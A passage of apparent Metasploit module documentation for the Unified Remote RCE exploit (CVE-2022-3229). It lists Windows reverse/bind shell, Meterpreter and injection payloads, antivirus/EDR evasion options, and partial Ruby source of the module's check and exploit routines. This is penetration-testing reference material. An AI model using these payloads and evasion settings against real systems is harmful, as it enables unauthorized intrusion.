81 payload/windows/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
82 payload/windows/meterpreter/reverse_tcp_rc4_dns normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
83 payload/windows/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support
84 payload/windows/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
85 payload/windows/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (winhttp)
86 payload/windows/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline
87 payload/windows/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline
88 payload/windows/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline
89 payload/windows/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline
90 payload/windows/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6)
91 payload/windows/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline
92 payload/windows/metsvc_bind_tcp normal No Windows Meterpreter Service, Bind TCP
93 payload/windows/metsvc_reverse_tcp normal No Windows Meterpreter Service, Reverse TCP Inline
94 payload/windows/patchupdllinject/bind_hidden_ipknock_tcp normal No Windows Inject DLL, Hidden Bind Ipknock TCP Stager
95 payload/windows/patchupdllinject/bind_hidden_tcp normal No Windows Inject DLL, Hidden Bind TCP Stager
96 payload/windows/patchupdllinject/bind_ipv6_tcp normal No Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86)
97 payload/windows/patchupdllinject/bind_ipv6_tcp_uuid normal No Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)
98 payload/windows/patchupdllinject/bind_named_pipe normal No Windows Inject DLL, Windows x86 Bind Named Pipe Stager
99 payload/windows/patchupdllinject/bind_nonx_tcp normal No Windows Inject DLL, Bind TCP Stager (No NX or Win7)
100 payload/windows/patchupdllinject/bind_tcp normal No Windows Inject DLL, Bind TCP Stager (Windows x86)
101 payload/windows/patchupdllinject/bind_tcp_rc4 normal No Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption, Metasm)
102 payload/windows/patchupdllinject/bind_tcp_uuid normal No Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86)
103 payload/windows/patchupdllinject/reverse_ipv6_tcp normal No Windows Inject DLL, Reverse TCP Stager (IPv6)
104 payload/windows/patchupdllinject/reverse_nonx_tcp normal No Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
105 payload/windows/patchupdllinject/reverse_ord_tcp normal No Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
106 payload/windows/patchupdllinject/reverse_tcp normal No Windows Inject DLL, Reverse TCP Stager
107 payload/windows/patchupdllinject/reverse_tcp_allports normal No Windows Inject DLL, Reverse All-Port TCP Stager
108 payload/windows/patchupdllinject/reverse_tcp_dns normal No Windows Inject DLL, Reverse TCP Stager (DNS)
109 payload/windows/patchupdllinject/reverse_tcp_rc4 normal No Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
110 payload/windows/patchupdllinject/reverse_tcp_rc4_dns normal No Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
111 payload/windows/patchupdllinject/reverse_tcp_uuid normal No Windows Inject DLL, Reverse TCP Stager with UUID Support
112 payload/windows/patchupmeterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager
113 payload/windows/patchupmeterpreter/bind_hidden_tcp normal No Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager
114 payload/windows/patchupmeterpreter/bind_ipv6_tcp normal No Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86)
115 payload/windows/patchupmeterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
116 payload/windows/patchupmeterpreter/bind_named_pipe normal No Windows Meterpreter (skape/jt Injection), Windows x86 Bind Named Pipe Stager
117 payload/windows/patchupmeterpreter/bind_nonx_tcp normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)
118 payload/windows/patchupmeterpreter/bind_tcp normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86)
119 payload/windows/patchupmeterpreter/bind_tcp_rc4 normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
120 payload/windows/patchupmeterpreter/bind_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86)
121 payload/windows/patchupmeterpreter/reverse_ipv6_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)
122 payload/windows/patchupmeterpreter/reverse_nonx_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
123 payload/windows/patchupmeterpreter/reverse_ord_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
124 payload/windows/patchupmeterpreter/reverse_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager
125 payload/windows/patchupmeterpreter/reverse_tcp_allports normal No Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
126 payload/windows/patchupmeterpreter/reverse_tcp_dns normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)
127 payload/windows/patchupmeterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
128 payload/windows/patchupmeterpreter/reverse_tcp_rc4_dns normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
129 payload/windows/patchupmeterpreter/reverse_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support
130 payload/windows/peinject/bind_hidden_ipknock_tcp normal No Windows Inject PE Files, Hidden Bind Ipknock TCP Stager
131 payload/windows/peinject/bind_hidden_tcp normal No Windows Inject PE Files, Hidden Bind TCP Stager
132 payload/windows/peinject/bind_ipv6_tcp normal No Windows Inject PE Files, Bind IPv6 TCP Stager (Windows x86)
133 payload/windows/peinject/bind_ipv6_tcp_uuid normal No Windows Inject PE Files, Bind IPv6 TCP Stager with UUID Support (Windows x86)
134 payload/windows/peinject/bind_named_pipe normal No Windows Inject PE Files, Windows x86 Bind Named Pipe Stager
135 payload/windows/peinject/bind_nonx_tcp normal No Windows Inject PE Files, Bind TCP Stager (No NX or Win7)
136 payload/windows/peinject/bind_tcp normal No Windows Inject PE Files, Bind TCP Stager (Windows x86)
137 payload/windows/peinject/bind_tcp_rc4 normal No Windows Inject PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
138 payload/windows/peinject/bind_tcp_uuid normal No Windows Inject PE Files, Bind TCP Stager with UUID Support (Windows x86)
139 payload/windows/peinject/reverse_ipv6_tcp normal No Windows Inject PE Files, Reverse TCP Stager (IPv6)
140 payload/windows/peinject/reverse_named_pipe normal No Windows Inject PE Files, Windows x86 Reverse Named Pipe (SMB) Stager
141 payload/windows/peinject/reverse_nonx_tcp normal No Windows Inject PE Files, Reverse TCP Stager (No NX or Win7)
142 payload/windows/peinject/reverse_ord_tcp normal No Windows Inject PE Files, Reverse Ordinal TCP Stager (No NX or Win7)
143 payload/windows/peinject/reverse_tcp normal No Windows Inject PE Files, Reverse TCP Stager
144 payload/windows/peinject/reverse_tcp_allports normal No Windows Inject PE Files, Reverse All-Port TCP Stager
145 payload/windows/peinject/reverse_tcp_dns normal No Windows Inject PE Files, Reverse TCP Stager (DNS)
146 payload/windows/peinject/reverse_tcp_rc4 normal No Windows Inject PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
147 payload/windows/peinject/reverse_tcp_rc4_dns normal No Windows Inject PE Files, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
148 payload/windows/peinject/reverse_tcp_uuid normal No Windows Inject PE Files, Reverse TCP Stager with UUID Support
149 payload/windows/pingback_bind_tcp normal No Windows x86 Pingback, Bind TCP Inline
150 payload/windows/pingback_reverse_tcp normal No Windows x86 Pingback, Reverse TCP Inline
151 payload/windows/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP
152 payload/windows/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP
153 payload/windows/powershell_reverse_tcp_ssl normal No Windows Interactive Powershell Session, Reverse TCP SSL
154 payload/windows/shell/bind_hidden_ipknock_tcp normal No Windows Command Shell, Hidden Bind Ipknock TCP Stager
155 payload/windows/shell/bind_hidden_tcp normal No Windows Command Shell, Hidden Bind TCP Stager
156 payload/windows/shell/bind_ipv6_tcp normal No Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)
157 payload/windows/shell/bind_ipv6_tcp_uuid normal No Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)
158 payload/windows/shell/bind_named_pipe normal No Windows Command Shell, Windows x86 Bind Named Pipe Stager
159 payload/windows/shell/bind_nonx_tcp normal No Windows Command Shell, Bind TCP Stager (No NX or Win7)
160 payload/windows/shell/bind_tcp normal No Windows Command Shell, Bind TCP Stager (Windows x86)
161 payload/windows/shell/bind_tcp_rc4 normal No Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
162 payload/windows/shell/bind_tcp_uuid normal No Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)
163 payload/windows/shell/reverse_ipv6_tcp normal No Windows Command Shell, Reverse TCP Stager (IPv6)
164 payload/windows/shell/reverse_nonx_tcp normal No Windows Command Shell, Reverse TCP Stager (No NX or Win7)
165 payload/windows/shell/reverse_ord_tcp normal No Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
166 payload/windows/shell/reverse_tcp normal No Windows Command Shell, Reverse TCP Stager
167 payload/windows/shell/reverse_tcp_allports normal No Windows Command Shell, Reverse All-Port TCP Stager
168 payload/windows/shell/reverse_tcp_dns normal No Windows Command Shell, Reverse TCP Stager (DNS)
169 payload/windows/shell/reverse_tcp_rc4 normal No Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
170 payload/windows/shell/reverse_tcp_rc4_dns normal No Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
171 payload/windows/shell/reverse_tcp_uuid normal No Windows Command Shell, Reverse TCP Stager with UUID Support
172 payload/windows/shell/reverse_udp normal No Windows Command Shell, Reverse UDP Stager with UUID Support
173 payload/windows/shell_bind_tcp normal No Windows Command Shell, Bind TCP Inline
174 payload/windows/shell_bind_tcp_xpfw normal No Windows Disable Windows ICF, Command Shell, Bind TCP Inline
175 payload/windows/shell_hidden_bind_tcp normal No Windows Command Shell, Hidden Bind TCP Inline
176 payload/windows/shell_reverse_tcp normal No Windows Command Shell, Reverse TCP Inline
177 payload/windows/speak_pwned normal No Windows Speech API - Say "You Got Pwned!"
178 payload/windows/upexec/bind_hidden_ipknock_tcp normal No Windows Upload/Execute, Hidden Bind Ipknock TCP Stager
179 payload/windows/upexec/bind_hidden_tcp normal No Windows Upload/Execute, Hidden Bind TCP Stager
180 payload/windows/upexec/bind_ipv6_tcp normal No Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)
181 payload/windows/upexec/bind_ipv6_tcp_uuid normal No Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)
182 payload/windows/upexec/bind_named_pipe normal No Windows Upload/Execute, Windows x86 Bind Named Pipe Stager
183 payload/windows/upexec/bind_nonx_tcp normal No Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
184 payload/windows/upexec/bind_tcp normal No Windows Upload/Execute, Bind TCP Stager (Windows x86)
185 payload/windows/upexec/bind_tcp_rc4 normal No Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm)
186 payload/windows/upexec/bind_tcp_uuid normal No Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)
187 payload/windows/upexec/reverse_ipv6_tcp normal No Windows Upload/Execute, Reverse TCP Stager (IPv6)
188 payload/windows/upexec/reverse_nonx_tcp normal No Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
189 payload/windows/upexec/reverse_ord_tcp normal No Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
190 payload/windows/upexec/reverse_tcp normal No Windows Upload/Execute, Reverse TCP Stager
191 payload/windows/upexec/reverse_tcp_allports normal No Windows Upload/Execute, Reverse All-Port TCP Stager
192 payload/windows/upexec/reverse_tcp_dns normal No Windows Upload/Execute, Reverse TCP Stager (DNS)
193 payload/windows/upexec/reverse_tcp_rc4 normal No Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
194 payload/windows/upexec/reverse_tcp_rc4_dns normal No Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
195 payload/windows/upexec/reverse_tcp_uuid normal No Windows Upload/Execute, Reverse TCP Stager with UUID Support
196 payload/windows/upexec/reverse_udp normal No Windows Upload/Execute, Reverse UDP Stager with UUID Support
197 payload/windows/vncinject/bind_hidden_ipknock_tcp normal No VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager
198 payload/windows/vncinject/bind_hidden_tcp normal No VNC Server (Reflective Injection), Hidden Bind TCP Stager
199 payload/windows/vncinject/bind_ipv6_tcp normal No VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
200 payload/windows/vncinject/bind_ipv6_tcp_uuid normal No VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
201 payload/windows/vncinject/bind_named_pipe normal No VNC Server (Reflective Injection), Windows x86 Bind Named Pipe Stager
202 payload/windows/vncinject/bind_nonx_tcp normal No VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
203 payload/windows/vncinject/bind_tcp normal No VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)
204 payload/windows/vncinject/bind_tcp_rc4 normal No VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
205 payload/windows/vncinject/bind_tcp_uuid normal No VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
206 payload/windows/vncinject/reverse_hop_http normal No VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
207 payload/windows/vncinject/reverse_http normal No VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet)
208 payload/windows/vncinject/reverse_http_proxy_pstore normal No VNC Server (Reflective Injection), Reverse HTTP Stager Proxy
209 payload/windows/vncinject/reverse_ipv6_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
210 payload/windows/vncinject/reverse_nonx_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
211 payload/windows/vncinject/reverse_ord_tcp normal No VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
212 payload/windows/vncinject/reverse_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager
213 payload/windows/vncinject/reverse_tcp_allports normal No VNC Server (Reflective Injection), Reverse All-Port TCP Stager
214 payload/windows/vncinject/reverse_tcp_dns normal No VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
215 payload/windows/vncinject/reverse_tcp_rc4 normal No VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
216 payload/windows/vncinject/reverse_tcp_rc4_dns normal No VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
217 payload/windows/vncinject/reverse_tcp_uuid normal No VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support
218 payload/windows/vncinject/reverse_winhttp normal No VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
219 payload/windows/x64/custom/bind_ipv6_tcp normal No Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager
220 payload/windows/x64/custom/bind_ipv6_tcp_uuid normal No Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support
221 payload/windows/x64/custom/bind_named_pipe normal No Windows shellcode stage, Windows x64 Bind Named Pipe Stager
222 payload/windows/x64/custom/bind_tcp normal No Windows shellcode stage, Windows x64 Bind TCP Stager
223 payload/windows/x64/custom/bind_tcp_rc4 normal No Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)
224 payload/windows/x64/custom/bind_tcp_uuid normal No Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)
225 payload/windows/x64/custom/reverse_http normal No Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)
226 payload/windows/x64/custom/reverse_https normal No Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)
227 payload/windows/x64/custom/reverse_named_pipe normal No Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager
228 payload/windows/x64/custom/reverse_tcp normal No Windows shellcode stage, Windows x64 Reverse TCP Stager
229 payload/windows/x64/custom/reverse_tcp_rc4 normal No Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
230 payload/windows/x64/custom/reverse_tcp_uuid normal No Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)
231 payload/windows/x64/custom/reverse_winhttp normal No Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)
232 payload/windows/x64/custom/reverse_winhttps normal No Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)
233 payload/windows/x64/exec normal No Windows x64 Execute Command
234 payload/windows/x64/loadlibrary normal No Windows x64 LoadLibrary Path
235 payload/windows/x64/messagebox normal No Windows MessageBox x64
236 payload/windows/x64/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
237 payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
238 payload/windows/x64/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
239 payload/windows/x64/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
240 payload/windows/x64/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)
241 payload/windows/x64/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
242 payload/windows/x64/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
243 payload/windows/x64/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
244 payload/windows/x64/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
245 payload/windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
246 payload/windows/x64/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
247 payload/windows/x64/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
248 payload/windows/x64/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
249 payload/windows/x64/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
250 payload/windows/x64/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline (x64)
251 payload/windows/x64/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline (x64)
252 payload/windows/x64/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline (x64)
253 payload/windows/x64/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
254 payload/windows/x64/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
255 payload/windows/x64/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline x64
256 payload/windows/x64/peinject/bind_ipv6_tcp normal No Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager
257 payload/windows/x64/peinject/bind_ipv6_tcp_uuid normal No Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager with UUID Support
258 payload/windows/x64/peinject/bind_named_pipe normal No Windows Inject Reflective PE Files, Windows x64 Bind Named Pipe Stager
259 payload/windows/x64/peinject/bind_tcp normal No Windows Inject Reflective PE Files, Windows x64 Bind TCP Stager
260 payload/windows/x64/peinject/bind_tcp_rc4 normal No Windows Inject Reflective PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
261 payload/windows/x64/peinject/bind_tcp_uuid normal No Windows Inject Reflective PE Files, Bind TCP Stager with UUID Support (Windows x64)
262 payload/windows/x64/peinject/reverse_named_pipe normal No Windows Inject Reflective PE Files, Windows x64 Reverse Named Pipe (SMB) Stager
263 payload/windows/x64/peinject/reverse_tcp normal No Windows Inject Reflective PE Files, Windows x64 Reverse TCP Stager
264 payload/windows/x64/peinject/reverse_tcp_rc4 normal No Windows Inject Reflective PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
265 payload/windows/x64/peinject/reverse_tcp_uuid normal No Windows Inject Reflective PE Files, Reverse TCP Stager with UUID Support (Windows x64)
266 payload/windows/x64/pingback_reverse_tcp normal No Windows x64 Pingback, Reverse TCP Inline
267 payload/windows/x64/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP
268 payload/windows/x64/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP
269 payload/windows/x64/powershell_reverse_tcp_ssl normal No Windows Interactive Powershell Session, Reverse TCP SSL
270 payload/windows/x64/shell/bind_ipv6_tcp normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
271 payload/windows/x64/shell/bind_ipv6_tcp_uuid normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
272 payload/windows/x64/shell/bind_named_pipe normal No Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
273 payload/windows/x64/shell/bind_tcp normal No Windows x64 Command Shell, Windows x64 Bind TCP Stager
274 payload/windows/x64/shell/bind_tcp_rc4 normal No Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
275 payload/windows/x64/shell/bind_tcp_uuid normal No Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
276 payload/windows/x64/shell/reverse_tcp normal No Windows x64 Command Shell, Windows x64 Reverse TCP Stager
277 payload/windows/x64/shell/reverse_tcp_rc4 normal No Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
278 payload/windows/x64/shell/reverse_tcp_uuid normal No Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
279 payload/windows/x64/shell_bind_tcp normal No Windows x64 Command Shell, Bind TCP Inline
280 payload/windows/x64/shell_reverse_tcp normal No Windows x64 Command Shell, Reverse TCP Inline
281 payload/windows/x64/vncinject/bind_ipv6_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
282 payload/windows/x64/vncinject/bind_ipv6_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
283 payload/windows/x64/vncinject/bind_named_pipe normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager
284 payload/windows/x64/vncinject/bind_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
285 payload/windows/x64/vncinject/bind_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
286 payload/windows/x64/vncinject/bind_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
287 payload/windows/x64/vncinject/reverse_http normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
288 payload/windows/x64/vncinject/reverse_https normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
289 payload/windows/x64/vncinject/reverse_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
290 payload/windows/x64/vncinject/reverse_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
291 payload/windows/x64/vncinject/reverse_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
292 payload/windows/x64/vncinject/reverse_winhttp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
293 payload/windows/x64/vncinject/reverse_winhttps normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)
Evasion Options
Here is the full list of possible evasion options supported by the windows/misc/unified_remote_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(windows/misc/unified_remote_rce) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTML::base64 none no Enable HTML obfuscation via an embeded base64 html object (IE not supported) (Accepted: n
one, plain, single_pad, double_pad, random_space_injection)
HTML::javascript::escape 0 no Enable HTML obfuscation via HTML escaping (number of iterations)
HTML::unicode none no Enable HTTP obfuscation via unicode (Accepted: none, utf-16le, utf-16be, utf-16be-marker,
utf-32le, utf-32be)
HTTP::chunked false no Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
HTTP::compression none no Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::junk_headers false no Enable insertion of random junk HTTP headers
HTTP::no_cache false no Disallow the browser to cache HTTP content
HTTP::server_name Apache yes Configures the Server header of all outgoing replies
TCP::max_send_size 0 no Maximum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Web interface is disabled. Unable to attempt bypass, assuming no authentication.
Here is a relevant code snippet related to the "Web interface is disabled. Unable to attempt bypass, assuming no authentication." error message:
441: return nil
442: end
443: disconnect
444: body = res.split("\r\n\r\n")[1]
445: if body.include?('<h1>Forbidden (403)</h1>')
446: print_error('Web interface is disabled. Unable to attempt bypass, assuming no authentication.')
447: return nil
448: else
449: # transient error where the JSON doesn't fully receive maybe 1/15 tries in my testing
450: begin
451: return JSON.parse(body) # split between headers and body
Unable to get config from web server, unknown status of Unified Remote Controller
Here is a relevant code snippet related to the "Unable to get config from web server, unknown status of Unified Remote Controller" error message:
483: end
484:
485: def check
486: security_mode = get_config
487: if security_mode.nil?
488: return CheckCode::Unknown('Unable to get config from web server, unknown status of Unified Remote Controller')
489: end
490:
491: CheckCode::Vulnerable("Unified Remote is vulnerable on port #{security_mode['interfaces']['tcp']['port']} with security mode '#{security_mode['security']['mode']}' (can be bypassed, if needed)")
492: end
493:
Unified Remote is vulnerable on port <VALUE> with security mode '<VALUE>' (can be bypassed, if needed)
Here is a relevant code snippet related to the "Unified Remote is vulnerable on port <VALUE> with security mode '<VALUE>' (can be bypassed, if needed)" error message:
486: security_mode = get_config
487: if security_mode.nil?
488: return CheckCode::Unknown('Unable to get config from web server, unknown status of Unified Remote Controller')
489: end
490:
491: CheckCode::Vulnerable("Unified Remote is vulnerable on port #{security_mode['interfaces']['tcp']['port']} with security mode '#{security_mode['security']['mode']}' (can be bypassed, if needed)")
492: end
493:
494: def exploit
495: if datastore['CLIENTNAME'].blank?
496: @client_name = "android-#{Rex::Text.rand_text_alphanumeric(16)}"
Go back to menu.
Related Pull Requests
- #17061 Merged Pull Request: mobile mouse server exploit
- #16989 Merged Pull Request: unified_remote exploit
References
- EDB-49587
- https://www.unifiedremote.com/
- https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/unified%20remote/unified-remote-rce.py
- CVE-2022-3229
See Also
Check also the following modules related to this module:
- exploit/multi/misc/jboss_remoting_unified_invoker_rce
- exploit/windows/misc/remote_control_collection_rce
- exploit/windows/misc/remote_mouse_rce
- exploit/windows/misc/ais_esel_server_rce
- exploit/windows/misc/hp_imc_dbman_restartdb_unauth_rce
- exploit/windows/misc/hp_imc_dbman_restoredbase_unauth_rce
- exploit/windows/misc/manageengine_eventlog_analyzer_rce
- exploit/windows/misc/mobile_mouse_rce
- exploit/windows/misc/wifi_mouse_rce
- exploit/windows/backupexec/remote_agent
- exploit/windows/browser/honeywell_hscremotedeploy_exec
- exploit/windows/fileformat/safenet_softremote_groupname
- exploit/linux/http/dlink_dcs_930l_authenticated_remote_command_execution
- exploit/multi/misc/claymore_dual_miner_remote_manager_rce
- exploit/multi/misc/msfd_rce_remote
- exploit/unix/webapp/pajax_remote_exec
- post/windows/gather/credentials/mremote
Authors
- h00die
- H4RK3NZ0
Version
This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.